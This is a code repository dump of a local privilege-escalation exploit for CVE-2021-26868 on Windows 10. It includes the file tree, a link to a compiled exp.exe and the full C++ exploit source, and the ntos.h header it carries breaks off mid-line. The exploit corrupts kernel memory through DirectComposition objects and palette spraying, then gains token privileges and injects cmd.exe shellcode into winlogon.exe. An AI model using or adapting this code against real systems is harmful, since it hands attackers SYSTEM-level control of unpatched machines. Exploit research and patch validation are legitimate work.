├── CVE-2021-26868 ├── Release │ └── exp.exe └── exp │ ├── exp.cpp │ └── ntos.h └── README.md /CVE-2021-26868/Release/exp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KangD1W2/CVE-2021-26868/b99bd262d408faa31800312edf790c287f681887/CVE-2021-26868/Release/exp.exe -------------------------------------------------------------------------------- /CVE-2021-26868/exp/exp.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include "ntos.h" 10 | #pragma comment(lib, "ntdll.lib") 11 | 12 | enum DCPROCESSCOMMANDID 13 | { 14 | nCmdProcessCommandBufferIterator, 15 | nCmdCreateResource, 16 | nCmdOpenSharedResource, 17 | nCmdReleaseResource, 18 | nCmdGetAnimationTime, 19 | nCmdCapturePointer, 20 | nCmdOpenSharedResourceHandle, 21 | nCmdSetResourceCallbackId, 22 | nCmdSetResourceIntegerProperty, 23 | nCmdSetResourceFloatProperty, 24 | nCmdSetResourceHandleProperty, 25 | nCmdSetResourceHandleArrayProperty, 26 | nCmdSetResourceBufferProperty, 27 | nCmdSetResourceReferenceProperty, 28 | nCmdSetResourceReferenceArrayProperty, 29 | nCmdSetResourceAnimationProperty, 30 | nCmdSetResourceDeletedNotificationTag, 31 | nCmdAddVisualChild, 32 | nCmdRedirectMouseToHwnd, 33 | nCmdSetVisualInputSink, 34 | nCmdRemoveVisualChild 35 | }; 36 | 37 | 38 | typedef 39 | NTSTATUS 40 | (NTAPI *_NtDCompositionCreateChannel)( 41 | OUT PHANDLE pArgChannelHandle, 42 | IN OUT PSIZE_T pArgSectionSize, 43 | OUT PVOID* pArgSectionBaseMapInProcess 44 | ); 45 | 46 | typedef 47 | NTSTATUS 48 | (NTAPI* _NtDCompositionDestroyChannel)( 49 | IN HANDLE ChannelHandle 50 | ); 51 | 52 | 53 | typedef 54 | NTSTATUS 55 | (NTAPI *_NtDCompositionProcessChannelBatchBuffer)( 56 | IN HANDLE hChannel, 57 | IN DWORD dwArgStart, 58 | OUT PDWORD pOutArg1, 59 | OUT PDWORD pOutArg2); 60 | 61 | typedef 62 | NTSTATUS 63 | (NTAPI* _NtDCompositionCommitChannel)( 64 | IN HANDLE hChannel, 65 | OUT PDWORD pOutArg1, 66 | OUT PDWORD pOutArg2, 67 | IN DWORD flag, 68 | IN HANDLE Object); 69 | 70 | typedef 71 | NTSTATUS 72 | (NTAPI* _NtDCompositionCreateSynchronizationObject)( 73 | void** a1 74 | ); 75 | 76 | 77 | typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)( 78 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 79 | PVOID SystemInformation, 80 | ULONG SystemInformationLength, 81 | PULONG ReturnLength); 82 | 83 | typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)( 84 | HANDLE ProcessHandle, 85 | void* BaseAddress, 86 | const void* SourceBuffer, 87 | size_t Length, 88 | size_t* BytesWritten); 89 | 90 | typedef struct _EXPLOIT_CONTEXT { 91 | PPEB pPeb; 92 | _NtQuerySystemInformation fnNtQuerySystemInformation; 93 | _NtWriteVirtualMemory fnNtWriteVirtualMemory; 94 | 95 | HANDLE hCurProcessHandle; 96 | HANDLE hCurThreadHandle; 97 | DWORD64 dwKernelEprocessAddr; 98 | DWORD64 dwKernelEthreadAddr; 99 | 100 | DWORD previous_mode_offset; 101 | 102 | DWORD win32_process_offset; // EPROCESS->Win32Process 103 | 104 | DWORD GadgetAddrOffset; 105 | DWORD ObjectSize; 106 | }EXPLOIT_CONTEXT, * PEXPLOIT_CONTEXT; 107 | 108 | PEXPLOIT_CONTEXT g_pExploitCtx; 109 | 110 | SIZE_T GetObjectKernelAddress(PEXPLOIT_CONTEXT pCtx, HANDLE object) 111 | { 112 | PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL; 113 | ULONG handleInfoSize = 0x1000; 114 | ULONG retLength; 115 | NTSTATUS status; 116 | SIZE_T kernelAddress = 0; 117 | BOOL bFind = FALSE; 118 | 119 | while (TRUE) 120 | { 121 | handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize); 122 | 123 | status = pCtx->fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength); 124 | 125 | if (status == 0xC0000004 || NT_SUCCESS(status)) // STATUS_INFO_LENGTH_MISMATCH 126 | { 127 | LocalFree(handleInfo); 128 | 129 | handleInfoSize = retLength + 0x100; 130 | handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize); 131 | 132 | status = pCtx->fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength); 133 | 134 | if (NT_SUCCESS(status)) 135 | { 136 | for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++) 137 | { 138 | if ((USHORT)object == 0x4) 139 | { 140 | if (0x4 == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)object == (SIZE_T)handleInfo->Handles[i].HandleValue) 141 | { 142 | kernelAddress = (SIZE_T)handleInfo->Handles[i].Object; 143 | bFind = TRUE; 144 | break; 145 | } 146 | } 147 | else 148 | { 149 | if (GetCurrentProcessId() == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)object == (SIZE_T)handleInfo->Handles[i].HandleValue) 150 | { 151 | kernelAddress = (SIZE_T)handleInfo->Handles[i].Object; 152 | bFind = TRUE; 153 | break; 154 | } 155 | } 156 | } 157 | } 158 | 159 | } 160 | 161 | if (handleInfo) 162 | LocalFree(handleInfo); 163 | 164 | if (bFind) 165 | break; 166 | } 167 | 168 | return kernelAddress; 169 | } 170 | 171 | void WriteMemory(void* dst, const void* src, size_t size) 172 | { 173 | size_t num_bytes_written; 174 | g_pExploitCtx->fnNtWriteVirtualMemory(GetCurrentProcess(), dst, src, size, &num_bytes_written); 175 | } 176 | 177 | DWORD64 ReadPointer(void* address) 178 | { 179 | DWORD64 value; 180 | WriteMemory(&value, address, sizeof(DWORD64)); 181 | return value; 182 | } 183 | 184 | void WritePointer(void* address, DWORD64 value) 185 | { 186 | WriteMemory(address, &value, sizeof(DWORD64)); 187 | } 188 | 189 | BOOL InitEnvironment() 190 | { 191 | g_pExploitCtx = new EXPLOIT_CONTEXT; 192 | 193 | g_pExploitCtx->fnNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation"); 194 | g_pExploitCtx->fnNtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtWriteVirtualMemory"); 195 | 196 | g_pExploitCtx->pPeb = NtCurrentTeb()->ProcessEnvironmentBlock; 197 | 198 | if (!DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), &g_pExploitCtx->hCurProcessHandle, 0, FALSE, DUPLICATE_SAME_ACCESS) || 199 | !DuplicateHandle(GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), &g_pExploitCtx->hCurThreadHandle, 0, FALSE, DUPLICATE_SAME_ACCESS)) 200 | return FALSE; 201 | 202 | g_pExploitCtx->dwKernelEprocessAddr = GetObjectKernelAddress(g_pExploitCtx, g_pExploitCtx->hCurProcessHandle); 203 | g_pExploitCtx->dwKernelEthreadAddr = GetObjectKernelAddress(g_pExploitCtx, g_pExploitCtx->hCurThreadHandle); 204 | 205 | if (g_pExploitCtx->pPeb->OSMajorVersion < 10) 206 | { 207 | return FALSE; 208 | } 209 | 210 | if (g_pExploitCtx->pPeb->OSBuildNumber < 17763 || g_pExploitCtx->pPeb->OSBuildNumber > 19042) 211 | { 212 | return FALSE; 213 | } 214 | 215 | switch (g_pExploitCtx->pPeb->OSBuildNumber) 216 | { 217 | case 18362: 218 | case 18363: 219 | g_pExploitCtx->win32_process_offset = 0x3b0; 220 | g_pExploitCtx->previous_mode_offset = 0x232; 221 | g_pExploitCtx->GadgetAddrOffset = 0x50; 222 | g_pExploitCtx->ObjectSize = 0x1a0; 223 | break; 224 | case 19041: 225 | case 19042: 226 | g_pExploitCtx->win32_process_offset = 0x508; 227 | g_pExploitCtx->previous_mode_offset = 0x232; 228 | g_pExploitCtx->GadgetAddrOffset = 0x38; 229 | g_pExploitCtx->ObjectSize = 0x1d0; 230 | break; 231 | default: 232 | break; 233 | } 234 | 235 | return TRUE; 236 | } 237 | 238 | DWORD64 where; 239 | 240 | HPALETTE createPaletteofSize1(int size) { 241 | int pal_cnt = (size + 0x8c - 0x90) / 4; 242 | int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY); 243 | LOGPALETTE* lPalette = (LOGPALETTE*)malloc(palsize); 244 | DWORD64* p = (DWORD64*)((DWORD64)lPalette + 4); 245 | memset(lPalette, 0xff, palsize); 246 | 247 | p[0] = (DWORD64)0xffffffff; 248 | p[3] = (DWORD64)0x04; 249 | p[9] = g_pExploitCtx->dwKernelEthreadAddr + g_pExploitCtx->previous_mode_offset - 9 - 8; 250 | 251 | lPalette->palNumEntries = pal_cnt; 252 | lPalette->palVersion = 0x300; 253 | return CreatePalette(lPalette); 254 | } 255 | 256 | HPALETTE createPaletteofSize2(int size) { 257 | int pal_cnt = (size + 0x8c - 0x90) / 4; 258 | int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY); 259 | LOGPALETTE* lPalette = (LOGPALETTE*)malloc(palsize); 260 | DWORD64* p = (DWORD64*)((DWORD64)lPalette + 4); 261 | memset(lPalette, 0xff, palsize); 262 | 263 | p[0] = (DWORD64)0xffffffff; 264 | p[3] = (DWORD64)0x04; 265 | p[9] = where - 8 + 3; 266 | 267 | lPalette->palNumEntries = pal_cnt; 268 | lPalette->palVersion = 0x300; 269 | return CreatePalette(lPalette); 270 | } 271 | 272 | 273 | // run cmd.exe 274 | unsigned char shellcode[] = 275 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \ 276 | "\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \ 277 | "\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \ 278 | "\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \ 279 | "\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \ 280 | "\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \ 281 | "\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \ 282 | "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \ 283 | "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \ 284 | "\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \ 285 | "\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \ 286 | "\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \ 287 | "\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \ 288 | "\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \ 289 | "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \ 290 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \ 291 | "\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \ 292 | "\x78\x65\x00"; 293 | 294 | static const unsigned int shellcode_len = 0x1000; 295 | 296 | 297 | 298 | #define MAXIMUM_FILENAME_LENGTH 255 299 | #define SystemModuleInformation 0xb 300 | #define SystemHandleInformation 0x10 301 | 302 | void InjectToWinlogon() 303 | { 304 | PROCESSENTRY32 entry; 305 | entry.dwSize = sizeof(PROCESSENTRY32); 306 | 307 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 308 | 309 | int pid = -1; 310 | if (Process32First(snapshot, &entry)) 311 | { 312 | while (Process32Next(snapshot, &entry)) 313 | { 314 | if (wcscmp(entry.szExeFile, L"winlogon.exe") == 0) 315 | { 316 | pid = entry.th32ProcessID; 317 | break; 318 | } 319 | } 320 | } 321 | 322 | CloseHandle(snapshot); 323 | 324 | if (pid < 0) 325 | { 326 | printf("Could not find process\n"); 327 | return; 328 | } 329 | 330 | HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 331 | if (!h) 332 | { 333 | printf("Could not open process: %x", GetLastError()); 334 | return; 335 | } 336 | 337 | void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 338 | if (!buffer) 339 | { 340 | printf("[-] VirtualAllocEx failed\n"); 341 | } 342 | 343 | if (!buffer) 344 | { 345 | printf("[-] remote allocation failed"); 346 | return; 347 | } 348 | 349 | if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0)) 350 | { 351 | printf("[-] WriteProcessMemory failed"); 352 | return; 353 | } 354 | 355 | HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0); 356 | 357 | if (hthread == INVALID_HANDLE_VALUE) 358 | { 359 | printf("[-] CreateRemoteThread failed"); 360 | return; 361 | } 362 | } 363 | 364 | 365 | #define TOKEN_OFFSET 0x40 //_SEP_TOKEN_PRIVILEGES offset 366 | 367 | HMODULE GetNOSModule() 368 | { 369 | HMODULE hKern = 0; 370 | hKern = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES); 371 | return hKern; 372 | } 373 | 374 | DWORD64 GetModuleAddr(const char* modName) 375 | { 376 | PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20); 377 | 378 | DWORD outBuffer = 0; 379 | NTSTATUS status = g_pExploitCtx->fnNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer); 380 | 381 | if (status == STATUS_INFO_LENGTH_MISMATCH) 382 | { 383 | free(buffer); 384 | buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer); 385 | status = g_pExploitCtx->fnNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer); 386 | } 387 | 388 | if (!buffer) 389 | { 390 | printf("[-] NtQuerySystemInformation error\n"); 391 | return 0; 392 | } 393 | 394 | for (unsigned int i = 0; i < buffer->NumberOfModules; i++) 395 | { 396 | PVOID kernelImageBase = buffer->Modules[i].ImageBase; 397 | PCHAR kernelImage = (PCHAR)buffer->Modules[i].FullPathName; 398 | if (_stricmp(kernelImage, modName) == 0) 399 | { 400 | free(buffer); 401 | return (DWORD64)kernelImageBase; 402 | } 403 | } 404 | free(buffer); 405 | return 0; 406 | } 407 | 408 | 409 | DWORD64 GetKernelPointer(HANDLE handle, DWORD type) 410 | { 411 | PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(0x20); 412 | 413 | DWORD outBuffer = 0; 414 | NTSTATUS status = g_pExploitCtx->fnNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer); 415 | 416 | if (status == STATUS_INFO_LENGTH_MISMATCH) 417 | { 418 | free(buffer); 419 | buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(outBuffer); 420 | status = g_pExploitCtx->fnNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer); 421 | } 422 | 423 | if (!buffer) 424 | { 425 | printf("[-] NtQuerySystemInformation error \n"); 426 | return 0; 427 | } 428 | 429 | for (size_t i = 0; i < buffer->NumberOfHandles; i++) 430 | { 431 | DWORD objTypeNumber = buffer->Handles[i].ObjectTypeIndex; 432 | 433 | if (buffer->Handles[i].UniqueProcessId == GetCurrentProcessId() && buffer->Handles[i].ObjectTypeIndex == type) 434 | { 435 | if (handle == (HANDLE)buffer->Handles[i].HandleValue) 436 | { 437 | DWORD64 object = (DWORD64)buffer->Handles[i].Object; 438 | free(buffer); 439 | return object; 440 | } 441 | } 442 | } 443 | printf("[-] handle not found\n"); 444 | free(buffer); 445 | return 0; 446 | } 447 | 448 | DWORD64 GetGadgetAddr(const char* name) 449 | { 450 | DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe"); 451 | HMODULE mod = GetNOSModule(); 452 | if (!mod) 453 | { 454 | printf("[-] leaking ntoskrnl version\n"); 455 | return 0; 456 | } 457 | DWORD64 offset = (DWORD64)GetProcAddress(mod, name); 458 | DWORD64 returnValue = base + offset - (DWORD64)mod; 459 | //printf("[+] FunAddr: %p\n", (DWORD64)returnValue); 460 | FreeLibrary(mod); 461 | return returnValue; 462 | } 463 | 464 | DWORD64 PsGetCurrentCProcessData() 465 | { 466 | DWORD64 dwWin32ProcessAddr = ReadPointer((void*)( g_pExploitCtx->dwKernelEprocessAddr + g_pExploitCtx->win32_process_offset) ); 467 | return ReadPointer((void*)(dwWin32ProcessAddr + 0x100)); 468 | } 469 | 470 | void RestoreStatus() 471 | { 472 | DWORD64 dwCGenericTableAddr = ReadPointer((void *)PsGetCurrentCProcessData()); 473 | 474 | WritePointer((void*)dwCGenericTableAddr, 0); 475 | WritePointer((void*)( dwCGenericTableAddr + 8 ), 0); 476 | WritePointer((void*)(dwCGenericTableAddr + 16), 0); 477 | 478 | byte value = 1; 479 | WriteMemory((void*)(g_pExploitCtx->dwKernelEthreadAddr + g_pExploitCtx->previous_mode_offset), &value, sizeof(byte)); 480 | } 481 | 482 | 483 | int main(int argc, TCHAR* argv[]) 484 | { 485 | HANDLE hChannel; 486 | NTSTATUS ntStatus; 487 | SIZE_T SectionSize = 0x500000; 488 | PVOID pMappedAddress = NULL; 489 | DWORD dwArg1, dwArg2; 490 | 491 | if (!InitEnvironment()) { 492 | printf("[-] Inappropriate Operating System\n"); 493 | return 0; 494 | } 495 | 496 | LoadLibrary(TEXT("user32")); 497 | 498 | LPVOID pV = VirtualAlloc((LPVOID)0xffffffff, 0x100000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 499 | if (!pV) 500 | { 501 | printf("[-] Failed to allocate memory at address 0xffffffff, please try again!\n"); 502 | return 0; 503 | } 504 | DWORD64* Ptr = (DWORD64*)0xffffffff; 505 | DWORD64 GadgetAddr = GetGadgetAddr("SeSetAccessStateGenericMapping"); 506 | 507 | //printf("[+] found SeSetAccessStateGenericMapping addr at: %p\n", (DWORD64)GadgetAddr); 508 | 509 | memset(Ptr, 0xff, 0x1000); 510 | *(DWORD64*)((DWORD64)Ptr + g_pExploitCtx->GadgetAddrOffset ) = GadgetAddr; 511 | 512 | 513 | HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId()); 514 | if (!proc) 515 | { 516 | printf("[-] OpenProcess failed\n"); 517 | return 0; 518 | } 519 | HANDLE token = 0; 520 | if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token)) 521 | { 522 | printf("[-] OpenProcessToken failed\n"); 523 | return 0; 524 | } 525 | 526 | DWORD64 ktoken = GetKernelPointer(token, 0x5); 527 | where = ktoken + TOKEN_OFFSET; 528 | 529 | _NtDCompositionCreateChannel NtDCompositionCreateChannel; 530 | NtDCompositionCreateChannel = (_NtDCompositionCreateChannel)GetProcAddress(LoadLibrary(L"win32u.dll"), "NtDCompositionCreateChannel"); 531 | 532 | _NtDCompositionDestroyChannel NtDCompositionDestroyChannel; 533 | NtDCompositionDestroyChannel = (_NtDCompositionDestroyChannel)GetProcAddress(LoadLibrary(L"win32u.dll"), "NtDCompositionDestroyChannel"); 534 | 535 | _NtDCompositionProcessChannelBatchBuffer NtDCompositionProcessChannelBatchBuffer; 536 | NtDCompositionProcessChannelBatchBuffer = (_NtDCompositionProcessChannelBatchBuffer)GetProcAddress(LoadLibrary(L"win32u.dll"), "NtDCompositionProcessChannelBatchBuffer"); 537 | 538 | _NtDCompositionCommitChannel NtDCompositionCommitChannel; 539 | NtDCompositionCommitChannel = (_NtDCompositionCommitChannel)GetProcAddress(LoadLibrary(L"win32u.dll"), "NtDCompositionCommitChannel"); 540 | 541 | _NtDCompositionCreateSynchronizationObject NtDCompositionCreateSynchronizationObject; 542 | NtDCompositionCreateSynchronizationObject = (_NtDCompositionCreateSynchronizationObject)GetProcAddress(LoadLibrary(L"win32u.dll"), "NtDCompositionCreateSynchronizationObject"); 543 | 544 | void* p = 0; 545 | ntStatus = NtDCompositionCreateSynchronizationObject(&p); 546 | 547 | // create a new channel 548 | ntStatus = NtDCompositionCreateChannel(&hChannel, &SectionSize, &pMappedAddress); 549 | if (!NT_SUCCESS(ntStatus)) { 550 | printf("Create channel error!\n"); 551 | return -1; 552 | } 553 | 554 | 555 | *(DWORD*)(pMappedAddress) = nCmdCreateResource; 556 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)1; 557 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = (DWORD)0x59; //DirectComposition::CInteractionTrackerBindingManagerMarshaler 558 | *(DWORD*)((PUCHAR)pMappedAddress + 0xC) = FALSE; 559 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x10, &dwArg1, &dwArg2); 560 | 561 | *(DWORD*)(pMappedAddress) = nCmdCreateResource; 562 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)2; 563 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = (DWORD)0x58; //DirectComposition::CInteractionTrackerMarshaler 564 | *(DWORD*)((PUCHAR)pMappedAddress + 0xC) = FALSE; 565 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x10, &dwArg1, &dwArg2); 566 | 567 | *(DWORD*)(pMappedAddress) = nCmdCreateResource; 568 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)3; 569 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = (DWORD)0x58; //DirectComposition::CInteractionTrackerMarshaler 570 | *(DWORD*)((PUCHAR)pMappedAddress + 0xC) = FALSE; 571 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x10, &dwArg1, &dwArg2); 572 | 573 | *(DWORD*)(pMappedAddress) = nCmdCreateResource; 574 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)4; 575 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = (DWORD)0x58; //DirectComposition::CInteractionTrackerMarshaler 576 | *(DWORD*)((PUCHAR)pMappedAddress + 0xC) = FALSE; 577 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x10, &dwArg1, &dwArg2); 578 | // 579 | // set argument of NtDCompositionProcessChannelBatchBuffer 580 | // 581 | 582 | DWORD* szBuff = (DWORD*)malloc(4 * 3); 583 | 584 | szBuff[0] = 0x02; 585 | szBuff[1] = 0x03; 586 | szBuff[2] = 0xffff; 587 | 588 | *(DWORD*)pMappedAddress = nCmdSetResourceBufferProperty; 589 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)(1); // CInteractionTrackerBindingManagerMarshaler 590 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = 0; 591 | *(DWORD*)((PUCHAR)pMappedAddress + 0xc) = 12; 592 | CopyMemory((PUCHAR)pMappedAddress + 0x10, szBuff, 12); 593 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x10 + 12, &dwArg1, &dwArg2); 594 | if (ntStatus != 0) 595 | { 596 | printf("error!\n"); 597 | return 0; 598 | } 599 | 600 | szBuff[0] = 0x02; 601 | szBuff[1] = 0x03; 602 | szBuff[2] = 0x0; 603 | 604 | *(DWORD*)pMappedAddress = nCmdSetResourceBufferProperty; 605 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)(1); 606 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = 0; 607 | *(DWORD*)((PUCHAR)pMappedAddress + 0xc) = 12; 608 | CopyMemory((PUCHAR)pMappedAddress + 0x10, szBuff, 12); 609 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x10 + 12, &dwArg1, &dwArg2); 610 | 611 | *(DWORD*)pMappedAddress = nCmdReleaseResource; 612 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)2; 613 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = 8; 614 | 615 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x8, &dwArg1, &dwArg2); 616 | if (ntStatus != 0) 617 | { 618 | printf("error!\n"); 619 | return 0; 620 | } 621 | for (size_t i = 0; i < 0x5000; i++) 622 | { 623 | createPaletteofSize1(g_pExploitCtx->ObjectSize); 624 | } 625 | 626 | *(DWORD*)pMappedAddress = nCmdReleaseResource; 627 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)3; 628 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = 8; 629 | 630 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x8, &dwArg1, &dwArg2); 631 | if (ntStatus != 0) 632 | { 633 | printf("error!\n"); 634 | return 0; 635 | } 636 | for (size_t i = 0; i < 0x5000; i++) 637 | { 638 | createPaletteofSize2(g_pExploitCtx->ObjectSize); 639 | } 640 | 641 | szBuff[0] = 0x04; 642 | szBuff[1] = 0x04; 643 | szBuff[2] = 0xffff; 644 | 645 | *(DWORD*)pMappedAddress = nCmdSetResourceBufferProperty; 646 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)(1); 647 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = 0; 648 | *(DWORD*)((PUCHAR)pMappedAddress + 0xc) = 12; 649 | CopyMemory((PUCHAR)pMappedAddress + 0x10, szBuff, 12); 650 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x10 + 12, &dwArg1, &dwArg2); 651 | 652 | if (ntStatus != 0) 653 | { 654 | printf("error!\n"); 655 | return 0; 656 | } 657 | 658 | 659 | NtDCompositionCommitChannel(hChannel, &dwArg1, &dwArg2, 0, p); 660 | 661 | 662 | //getc(stdin); 663 | InjectToWinlogon(); 664 | 665 | RestoreStatus(); 666 | 667 | *(DWORD*)pMappedAddress = nCmdReleaseResource; 668 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)1; 669 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = 8; 670 | 671 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x8, &dwArg1, &dwArg2); 672 | 673 | *(DWORD*)pMappedAddress = nCmdReleaseResource; 674 | *(HANDLE*)((PUCHAR)pMappedAddress + 4) = (HANDLE)4; 675 | *(DWORD*)((PUCHAR)pMappedAddress + 8) = 8; 676 | 677 | ntStatus = NtDCompositionProcessChannelBatchBuffer(hChannel, 0x8, &dwArg1, &dwArg2); 678 | 679 | return 0; 680 | } 681 | -------------------------------------------------------------------------------- /CVE-2021-26868/exp/ntos.h: -------------------------------------------------------------------------------- 1 | /************************************************************************************ 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2015 - 2017, translated from Microsoft sources/debugger 4 | * 5 | * TITLE: NTOS.H 6 | * 7 | * VERSION: 1.74 8 | * 9 | * DATE: 01 Dec 2017 10 | * 11 | * Common header file for the ntos API functions and definitions. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | ************************************************************************************/ 19 | #ifdef _In_reads_ 20 | #undef _In_reads_ 21 | #endif 22 | #define _In_reads_(s) 23 | 24 | #ifdef _In_reads_bytes_ 25 | #undef _In_reads_bytes_ 26 | #endif 27 | #define _In_reads_bytes_(s) 28 | 29 | #ifdef _Out_writes_opt_ 30 | #undef _Out_writes_opt_ 31 | #endif 32 | #define _Out_writes_opt_(s) 33 | 34 | #define _Out_writes_to_opt_(s,c) 35 | #ifdef _Out_writes_bytes_to_opt_ 36 | #undef _Out_writes_bytes_to_opt_ 37 | #endif 38 | #define _Out_writes_bytes_to_opt_(s,c) 39 | 40 | 41 | #pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int 42 | 43 | #define IN_REGION(x, Base, Size) (((ULONG_PTR)x >= (ULONG_PTR)Base) && ((ULONG_PTR)x <= (ULONG_PTR)Base + (ULONG_PTR)Size)) 44 | 45 | #define ALIGN_DOWN(count,size) \ 46 | ((ULONG_PTR)(count) & ~((ULONG_PTR)(size) - 1)) 47 | 48 | #define ALIGN_UP(count,size) \ 49 | (ALIGN_DOWN( (ULONG_PTR)(count)+(ULONG_PTR)(size)-1, (ULONG_PTR)(size) )) 50 | 51 | #define ARGUMENT_PRESENT(ArgumentPointer) (\ 52 | (CHAR *)((ULONG_PTR)(ArgumentPointer)) != 